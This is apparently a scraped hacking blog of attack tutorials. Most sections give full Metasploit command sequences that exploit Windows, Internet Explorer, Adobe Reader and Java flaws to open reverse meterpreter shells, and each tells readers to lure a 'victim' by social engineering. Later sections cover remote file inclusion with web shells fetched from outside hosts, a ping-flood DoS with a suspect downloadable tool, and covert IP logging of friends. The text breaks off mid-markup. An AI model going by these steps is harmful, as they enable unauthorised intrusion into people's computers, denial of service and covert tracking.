How to Hack Windows 7 using Metaspolit

<div dir="ltr" style="text-align: left;" trbidi="on">The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.<br /><br /><h3 style="text-align: left;">Requirement</h3><div style="text-align: left;"><br />metasploit<br /><br />Windows 7<br /><br />Open terminal type<br /><br />msfconsole<br /><br />use auxiliary/server/browser_autopwn<br /><br />show options<br /><br /><br />Now set LHOST, PORT and URIPATH<br /><br />Msf auxiliary(browser_autppwn) > set lhost 192.168.1.4 (The IP address of your computer )<br /><br />Msf auxiliary(browser_autppwn) > set port 4444 (The default port of your Metasploit program)<br /><br />Msf auxiliary(browser_autppwn) > set uripath /<br /><br />Msf auxiliary(browser_autppwn) > exploit (to launch a exploit on targeted machine)<br /><br />Send the link of the server to the victim via chat or email or any social engineering technique.<br /><br />You now have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“</div></div>

How to Hack Windows 7 using Metaspolit

The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids in pe...

+ Read more »

Hack windows 7 PC using MS11_003 Internet Explorer Exploit

<div dir="ltr" style="text-align: left;" trbidi="on">This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.<br /><br /><h3 style="text-align: left;">Exploit Targets</h3><div style="text-align: left;"><br />0 – Automatic (default)<br /><br />1 – Internet Explorer 8<br /><br />2 – Internet Explorer 7<br /><br />3 – Internet Explorer 6<br /><br />4 – Debug Target (Crash)</div><br /><h3 style="text-align: left;">Requirement</h3><div style="text-align: left;"><br />Attacker: metasploit<br /><br />Victim PC: Windows 7<br /><br />Open terminal type<br /><br />msfconsole<br /><br />use exploit/windows/browser/ms11_003_ie_css_import<br /><br />Msf exploit (ms11_003_ie_css_import)>set payload windows/meterpreter/reverse_tcp<br /><br />Msf exploit (ms11_003_ie_css_import)>set srvhost 192.168.1.4 (This must be an address on the local machine)<br /><br />Msf exploit (ms11_003_ie_css_import)>set srvport 80 (The local port to listen on default: 8080)<br /><br />Msf exploit (ms11_003_ie_css_import)>set uripath newhackingvideos (The Url to use for this exploit)<br /><br />Msf exploit (ms11_003_ie_css_import)>set lhost 192.168.1.4 (IP of Local Host)<br /><br />Msf exploit (ms11_003_ie_css_import)>exploit<br /><br /><br />Now an URL you should give to your victim http://192.168.1.4/newhackingvideos.avi<br /><br />Send the link of the server to the victim via chat or email or any social engineering technique.<br /><br />Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“</div></div>

Hack windows 7 PC using MS11_003 Internet Explorer Exploit

This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a recur...

+ Read more »

Hack Remote XP using Heap Overflow Attack

<div dir="ltr" style="text-align: left;" trbidi="on">This module exploits heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than what is available on the heap (0×400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. Note: At this time, for IE 8 target, you may either choose the JRE ROP, or the msvcrt ROP to bypass DEP (Data Execution Prevention). Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.<br /><br /><h3 style="text-align: left;">Exploit Targets</h3><div style="text-align: left;"><br />Windows XP service pack 2<br /><br />Windows XP service pack 3</div><br /><h3 style="text-align: left;">Requirement</h3><br /><br />Attacker: metasploit<br /><br />Victim PC: Windows XP<br /><br />Open backtrack terminal type<br /><br />msfconsole<br /><br /><br />Now type <br /><br />use exploit/windows/browser/ms12_004_midi<br /><br />Msf exploit (ms12_004_midi)>set payload windows/meterpreter/reverse_tcp<br /><br />Msf exploit (ms12_004_midi)>set lhost 192.168.1.4 (IP of Local Host)<br /><br />Msf exploit (ms12_004_midi)>set port 4444 (Port of Local PC)<br /><br />Msf exploit (ms12_004_midi)>set srvhost 192.168.1.4 (This must be an address on the local machine)<br /><br />Msf exploit (ms12_004_midi)>set srvport 80 (The local port to listen on default: 8080)<br /><br />Msf exploit (ms12_004_midi)>set uripath salesreport (The Url to use for this exploit)<br /><br />Msf exploit (ms12_004_midi)>exploit<br /><br /><br />Now an URL you should give to your victim http://192.168.1.4/salesreport<br /><br />Send the link of the server to the victim via chat or email or any social engineering technique.<br /><br />Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“</div>

Hack Remote XP using Heap Overflow Attack

This module exploits heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specia...

+ Read more »

Hack Windows XP using Shell Link Code Execution

<div dir="ltr" style="text-align: left;" trbidi="on">This module exploits vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.<br />Exploit Targets<br /><br />Windows XP service pack 2<br /><br />Windows XP service pack 3<br /><div style="text-align: left;"><br /></div><h3 style="text-align: left;">Requirement</h3><div style="text-align: left;"><br />Attacker:metasploit<br /><br />Victim PC: Windows XP<br /><br />Open terminal type<br /><br />msfconsole<br /><br />use exploit/windows/browser/ms10_046_shortcut_icon_dllloader<br /><br />Msf exploit(ms10_046_shortcut_icon_dllloader)>set payload windows/meterpreter/reverse_tcp<br /><br />Msf exploit (ms10_046_shortcut_icon_dllloader)>set lhost 192.168.1.6(IP of Local Host)<br /><br />Msf exploit (ms10_046_shortcut_icon_dllloader)>set srvhost 192.168.1.6(This must be an address on the local machine)<br /><br />Msf exploit (ms10_046_shortcut_icon_dllloader)>set uripath /(The Url to use for this exploit)<br /><br />Msf exploit (ms10_046_shortcut_icon_dllloader)>exploit<br /><br />Now an URL you should give to your victim http://192.168.1.6/<br /><br />Send the link of the server to the victim via chat or email or any social engineering technique.<br /><br />Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“<br /></div></div>

Hack Windows XP using Shell Link Code Execution

This module exploits vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DL...

+ Read more »

Hack Remote PC with Operation Aurora Attack

<div dir="ltr" style="text-align: left;" trbidi="on">Operation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.<br /><br />The attack has been aimed at dozens of other organizations, of whichAdobe Systems, Juniper NetworksandRackspacehave publicly confirmed that they were targeted. According to media reports,Yahoo,Symantec, Northrop Grumman, MorganStanley and DowChemicalwere also among the targets.<br /><br />Exploit Targets<br /><br />Web Browser: Internet Explorer 5, Internet Explorer 6, Internet Explorer 7, Internet Explorer 8<br /><br />Operating System: Windows vista, windows 7, windows server 2008<br /><div style="text-align: left;"><br /></div><h3 style="text-align: left;">Requirement</h3><div style="text-align: left;"><br />Attacker:metasploit<br /><br />Victim PC: Windows XP<br /><br />Open terminal type<br /><br />msfconsole<br /><br />use exploit/windows/browser/ms10_002_aurora<br /><br />Msf exploit(ms10_002_aurora)>set payload windows/meterpreter/reverse_tcp<br /><br />Msf exploit (ms10_002_aurora)>set lhost 192.168.1.4(IP of Local Host)<br /><br />Msf exploit (ms10_002_aurora)>set srvhost 192.168.1.4(This must be an address on the local machine)<br /><br />Msf exploit (ms10_002_aurora)>set uripathmeeting(The Url to use for this exploit)<br /><br />Msf exploit (ms10_002_aurora)>exploit<br /><br />Now an URL you should give to your victim http://192.168.1.4/meeting<br /><br />Send the link of the server to the victim via chat or email or any social engineering technique.<br /><br />Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“</div></div>

Hack Remote PC with Operation Aurora Attack

Operation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by ...

+ Read more »

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

<div dir="ltr" style="text-align: left;" trbidi="on">This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.<br />Exploit Targets<br /><br />0 – Adobe Reader v9.0.0 (Windows XP SP3 English) (default)<br /><br />1 – Adobe Reader v8.1.2 (Windows XP SP2 English)<br /><br /><h3 style="text-align: left;">Requirement</h3><div style="text-align: left;"><br />Attacker:metasploit<br /><br />Victim PC: Windows XP<br /><br />Open terminal type<br /><br />msfconsole<br /><br />use exploit/windows/browser/adobe_jbig2decode<br /><br />Msf exploit(adobe_jbig2decode)>set payload windows/meterpreter/reverse_tcp<br /><br />Msf exploit (adobe_jbig2decode)>set lhost 192.168.1.4(IP of Local Host)<br /><br />Msf exploit (adobe_jbig2decode)>set srvhost 192.168.1.4(This must be an address on the local machine)<br /><br />Msf exploit (adobe_jbig2decode)>set uripathakonsong(The Url to use for this exploit)<br /><br />Msf exploit (adobe_jbig2decode)>exploit<br /><br />Now an URL you should give to your victimhttp://192.168.1.4:8080/akonsong<br /> </div>When the victim opens that link in their browser, immediately it will alert a dialog box about akonsong PDF .<br /><br />Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“<br /></div>

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap...

+ Read more »

Hack remote PC using Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow

<div dir="ltr" style="text-align: left;" trbidi="on">This module exploits vulnerability in the Smart Independent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version is assumed to be vulnerable as well.<br /><br />Exploit Targets<br /><br />0 – Automatic (default)<br /><br />Requirement<br /><br />Victim PC: Windows XP<br /><br />Open backtrack terminal type<br /><br />msfconsole<br /><br />use exploit/windows/browser/adobe_cooltype_sing<br /><br />Msf exploit(adobe_cooltype_sing)>set payload windows/meterpreter/reverse_tcp<br /><br />Msf exploit (adobe_cooltype_sing)>set lhost 192.168.1.3(IP of Local Host)<br /><br />Msf exploit (adobe_cooltype_sing)>set srvhost 192.168.1.3(This must be an address on the local machine)<br /><br />Msf exploit (adobe_cooltype_sing)>set uripathfinalreport(The Url to use for this exploit)<br /><br />Msf exploit (adobe_cooltype_sing)>exploit<br /><br />Now an URL you should give to your victim http://192.168.1.3/finalreport<br /><br />Send the link of the server to the victim via chat or email or any social engineering technique.<br /><br />Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“<br /></div>

Hack remote PC using Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow

This module exploits vulnerability in the Smart Independent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. ...

+ Read more »

Hack Remote PC using Sun Java Command Line Injection

<div dir="ltr" style="text-align: left;" trbidi="on">Sun Java Web Start Plugin Command Line Argument Injection<br /><br />This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled<br /><br />Exploit Targets<br /><br />0 – Automatic (default)<br /><br />1 – Java Runtime on Windows x86<br /><br />Requirement<br /><br />Attacker: metasploit<br /><br />Victim PC: Windows XP<br /><br />Open backtrack terminal type<br /><br />msfconsole<br /><br />use exploit/windows/browser/java_ws_vmargs<br /><br />Msf exploit(java_ws_vmargs)>set payload windows/meterpreter/reverse_tcp<br /><br />Msf exploit (java_ws_vmargs)>set lhost 192.168.1.3(IP of Local Host)<br /><br />Msf exploit (java_ws_vmargs)>set srvhost 192.168.1.3(This must be an address on the local machine)<br /><br />Msf exploit (java_ws_vmargs)>set srvport 80<br /><br />Msf exploit (java_ws_vmargs)>set uripath /(The Url to use for this exploit)<br /><br />Msf exploit (java_ws_vmargs)>exploit<br /><br />Now an URL you should give to your victim http://192.168.1.3/<br /><br />Send the link of the server to the victim via chat or email or any social engineering technique.<br /><br />Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“</div>

Hack Remote PC using Sun Java Command Line Injection

Sun Java Web Start Plugin Command Line Argument Injection This module exploits a flaw in the Web Start component of the Sun Java Runtime Env...

+ Read more »

How to Hack Remote PC using pdf

<div dir="ltr" style="text-align: left;" trbidi="on">Adobe FlateDecode Stream Predictor 02 Integer Overflow<br /><br />This module exploits integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.<br />Exploit Targets<br /><br />0 – Adobe Reader Windows Universal (JS Heap Spray) (default)<br />Requirement<br /><br />Attacker: metasploit<br /><br />Victim PC: Windows XP<br /><br />Open terminal type<br /><br />msfconsole<br /><br />use exploit/windows/fileformat/adobe_flatedecode_predictor02<br /><br />Msf exploit(adobe_flatedecode_predictor02)>set payload windows/meterpreter/reverse_tcp<br /><br />Msf exploit(adobe_flatedecode_predictor02)>show options<br /><br />Msf exploit (adobe_flatedecode_predictor02)>set lhost 192.168.1.3 (IP of Local Host)<br /><br />Msf exploit (adobe_flatedecode_predictor02)>set filename attack.pdf<br /><br />Msf exploit (adobe_flatedecode_predictor02)>exploit<br /><br />After we successfully generate the malicious PDF, it will stored on your local computer<br /><br />/root/.msf4/local/attack.pdf<br /><br />Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.<br /><br />use exploit/multi/handler<br /><br />set payload windows/meterpreter/reverse_tcp<br /><br />set lhost 192.168.1.3<br /><br />exploit<br /><br />Now send yourattack.pdffiles to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer<br /></div>

How to Hack Remote PC using pdf

Adobe FlateDecode Stream Predictor 02 Integer Overflow This module exploits integer overflow vulnerability in Adobe Reader and Adobe Acrobat...

+ Read more »

Redirect Site to Another Site

<div dir="ltr" style="text-align: left;" trbidi="on"><br />A simple text file edit makes sites redirect to another. When you type address in address bar in any browser and enter it then it will display another web page, for example:- when you type Google.com you will be redirected to yahoo.com<br /><br />Instructions to do:<br /><br />1) Go to this directory [c:\windows\system32\drivers\etc], directory may change according to drive used for os installation<br />2) then hit enter<br />3) find a file named "hosts"<br />4) Right click on it and open with word pad.<br />5) In the last link of the document type the IP* address of yahoo space www.Google.com (Vice versa for other sites)<br />6) now save it<br />7) restart the browser if its already running<br />8) Now try it, It works perfect<br /><br />IP*: to find IP address of that website Goto start ->Run > type cmd > enter. Now you have a new window on desktop. On that type this without cotes "ping www. yahoo.com"<br />replace yahoo.com with your preferred site and then enter it</div>

Redirect Site to Another Site

A simple text file edit makes sites redirect to another. When you type address in address bar in any browser and enter it then it will displ...

+ Read more »

How to Do Remote File Inclusion?

<div dir="ltr" style="text-align: left;" trbidi="on">Remote File Inclusion (RFI)occurs when a remote file, usually a shell(a graphical interface for browsing remote files and running your own code on a server), is included into a website which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server. With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system.<br /><br />Many servers are vulnerable to this kind of attack because of PHP’s  default settings of register_globals and allow_url_fopen being enabled. Although as of PHP 6.0, register_globals has been depreciated and removed, many websites still rely on older versions of PHP to run their webapplications. Now let’s go through the steps a hacker would take to exploit this type of vulnerability in a website..<br /><br /><br />1.First the hacker would find a website that gets its pages via the PHP include() function and is vulnerable to RFI. Many hackers us Google dorks to locate servers vulnerable to RFI. A Google dork i the act of using Google’s provided search tools to help get a specific search result.<br /><br />2.Website that include pages have a navigation system similar to:<br />http://target-site.com/index.php?page=PageName<br /><br />3.To see if a the page is vulnerable, the hacker would try to include a site instead of PageName like the following:<br />http://target-site.com/index.php?page=http://google.com<br /><br />4.If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell.<br /><br />5.A couple of the most popular shells are c99 and r57. A hacker would either upload them to a remote server or just use a Google dork to locate them already online and insert them. To find the a shell the hacker would search Google for: inurl:c99.txt. This will<br />display many websites with the shell already up and ready to be included. At the end of the URL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems. The new URL with the shell included would look like:<br /><br />http://target-site.com/index.php?page=http://site.com/c99.txt?<br /><br />6.Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get around this, you would add a null byte () to the end of c99.txt. This tells the server to ignore everything after c99.txt.<br /><br />7.In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dorkwould be: allinurl:.php?page=. This looks for URL’s with .php?page=in them. This is only an example and you most likely won’t find any vulnerable sites with that search. You can try<br />switching around the word “page” with other letters and similar words. Hackers usually search vulnerability databases like www.milw0rm.comfor already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork.<br /><br />8.If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen similar to the following:<br /><br />The shell will display information about the remote server and list all the files and directories on it. From here the hacker would find a directory that has read and write privileges and upload the shell butthis time as a .php file so that incase the vulnerability is fixed, he will be able to access it later on.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0wLVQU-G7c7O8CaZ6ofqdklvK9NjXo6XUuEVBBXXDg9kRg5fCC-q7Csh1yZ3_gtWgRiEl0cNTlJ3LOSud7RkZcwjqyJKNVVp2d_CnuaI92f2a6xArfbNvla7NrHxEwIrBaD2C-NVxi_ja/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black;"><img alt="RFi-tutorial" border="0" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0wLVQU-G7c7O8CaZ6ofqdklvK9NjXo6XUuEVBBXXDg9kRg5fCC-q7Csh1yZ3_gtWgRiEl0cNTlJ3LOSud7RkZcwjqyJKNVVp2d_CnuaI92f2a6xArfbNvla7NrHxEwIrBaD2C-NVxi_ja/s320/Untitled.png" title="RFi-tutorial" width="320" /></span></a></div><div align="LEFT" style="border: none; line-height: 0.25in; margin-bottom: 0in; padding: 0in;"><span style="font-family: Georgia, Times New Roman, serif;"><span style="font-size: small;"><br /></span></span></div><div align="LEFT" style="border: none; line-height: 0.25in; margin-bottom: 0in; padding: 0in;"><span style="font-size: small;">9. The hacker would next find a way to gain root privileges on the system. He can do this by uploading and running local exploits against the server. He could also search the victim server for configuration files. These files may contain username and passwords for the MYSQL databases and such.<br /><br />To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure you server php.ini file has register_globals and allow_url_fopen disabled.<br /></span></div><span style="color: #eeeeee;"><br /></span></div>

How to Do Remote File Inclusion?

Remote File Inclusion (RFI)occurs when a remote file, usually a shell(a graphical interface for browsing remote files and running your own c...

+ Read more »

DOS ATTACK ON WEBSITE.

<div dir="ltr" style="text-align: left;" trbidi="on"><br />DOWNLOAD TOOL FROM <a href="http://www.4shared.com/zip/yoBzbiiX/loworbitioncannon.html" target="_blank">HERE</a>.<br />ALTHOUGH IT SHOW THAT FILE IS VIRUS INFECTED ,BUT IT`S NOT.<br />PLACE I.P ADDRESS OR DOMAIN NAME OF THE WEBSITE &PRESS ENTER.<br /><br />OR YOU CAN DO IT MANUALLY ALSO. JUST OPEN CMD & TYPE COMMAND.BUT IT`S OLD METHOD , SO I RECOMMEND YOU TO USE TOOL.<br /><br />ping (Ip Address) -t -l 65000<br /><div><br /></div><div>IF YOU WANT TO KNOW MORE ABOUT IT. PLEASE READ FOLLOWING DOCUMENT.</div><div>IT HAS EXPLAINED EVERYTHING. <a href="http://www.4shared.com/office/dd5WIu_Q/Dos_Attacked.html" target="_blank">CLICK HERE.</a></div></div>

DOS ATTACK ON WEBSITE.

DOWNLOAD TOOL FROM  HERE . ALTHOUGH IT SHOW THAT FILE IS VIRUS INFECTED ,BUT IT`S NOT. PLACE I.P ADDRESS OR DOMAIN NAME OF THE WEBSITE &...

+ Read more »

How to Find i.p Address of Remote computer?

<div dir="ltr" style="text-align: left;" trbidi="on"><br /><br /><div align="JUSTIFY" style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">This is the article about getting the IP address of the remote computer i.e in terms of hacking getting the IP address of the victim computer.</span></span></div><div align="JUSTIFY" style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">Before proceeding lets know something about IP address.</span></span></div><div style="line-height: 0.21in; margin-bottom: 0in;"><br /></div><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;"><b>0x01-What is IP address?</b></span></span></div><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">IP address means Internet Protocol address - An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer etc.) participating in a computer network that uses the Internet Protocol for communication.</span></span></div><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">IP address serves for two basic purposes:</span></span></div><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">1. Host or network interface identification</span></span></div><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">2. Location Addressing</span></span></div><div style="line-height: 0.21in; margin-bottom: 0in;"><br /><a name='more'></a><br /></div><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">Now lets move to our moto..........</span></span></div><div align="JUSTIFY" style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;"><b>0x02-How to get IP address of remote computer or victim computer?</b></span></span></div><div style="line-height: 0.21in; margin-bottom: 0.2in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">There are four techniques to get the IP address of remote computer or victim computer. These are as follows:</span></span></div><ol><li><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times New Roman;"><span style="font-size: small;">Using PHP notification script.</span></span></div></li><li><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times New Roman;"><span style="font-size: small;">Sniffing during chat sessions.</span></span></div></li><li><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times New Roman;"><span style="font-size: small;">Using Blogs and Websites.</span></span></div></li><li><div style="line-height: 0.21in;"><span style="font-family: Times New Roman;"><span style="font-size: small;">Using read notify service.</span></span></div></li></ol><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">Now lets go in detail one by one ....................</span></span></div><div align="JUSTIFY" style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;"><b>1. Using PHP notification script.</b></span></span></div><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">Using this Notification script you can get the IP address in just seconds.</span></span></div><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">Steps of using this PHP script:</span></span></div><div style="line-height: 0.21in;"><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;"><a href="http://www.4shared.com/zip/LJSZzN4y/IP_Finder.html" target="_blank">Download ip finder script</a>(IP_Finder.ZIP)</span></span></div><ol><li><div align="JUSTIFY" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.24in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;">Open a new account in</span></span><a href="http://x10hosting.com/" target="_blank"><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;">X10Hosting</span></span></a><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;">(or any other free host that supports PHP).</span></span></div></li><li><div align="JUSTIFY" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.24in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;">Extract the IP_Finder.ZIP file and upload the two files </span></span><strong><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;"><span style="font-weight: normal;">ip.php </span></span></span></strong><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;">and </span></span><strong><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;"><span style="font-weight: normal;">ip_log.txt </span></span></span></strong><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;">into the root folder of your hosting account using the File Manager.</span></span></div></li><li><div align="JUSTIFY" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.24in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;">You can rename the </span></span><strong><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;"><span style="font-weight: normal;">ip.php </span></span></span></strong><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;">to any name of your choice.</span></span></div></li><li><div align="JUSTIFY" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.24in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;">Set the permission to</span></span><strong><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;"><span style="font-weight: normal;">777</span></span></span></strong><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;">on </span></span><strong><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;"><span style="font-weight: normal;">ip_log.txt</span></span></span></strong><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;">.</span></span></div><div align="JUSTIFY" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.24in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"></div></li></ol><div align="JUSTIFY" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.24in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;">You have to send the </span></span><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;">of ip.php </span></span><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;">to you friend via email or while chatting and ask him to visit that link.Once your friend clicks on the link, his IP address will be recorded along with the Date and Time in the ip_log.txt file</span></span><span style="font-family: Arial, Verdana, sans-serif;"><span style="font-size: small;">. After recording the IP address, the script will redirect the person to google.com so as to avoid any suspicion.</span></span></div><div style="line-height: 0.21in; margin-bottom: 0in;"><br /></div><div style="line-height: 0.21in; margin-bottom: 0in;"><br /></div><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;"><b>2. Sniffing during chat sessions.</b></span></span></div><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">With the help of Sniffers like wireshark etc. you can sniff the Gmail, and yahoo or any other chat sessions while we are chatting to any of your friend and extract the IP address from there.</span></span></div><div style="line-height: 0.21in; margin-bottom: 0in;"><br /></div><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;"><b>3. Using Blogs and Websites.</b></span></span></div><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">This method is for those who have their blogs or websites. Normal users can also do this as blog is free to make. Make a new blog and use any stats service like histats or any other stats widget. Just add a new widget and put histats code there and save template. And send the link of your blog to your friend and get his IP.</span></span></div><div style="line-height: 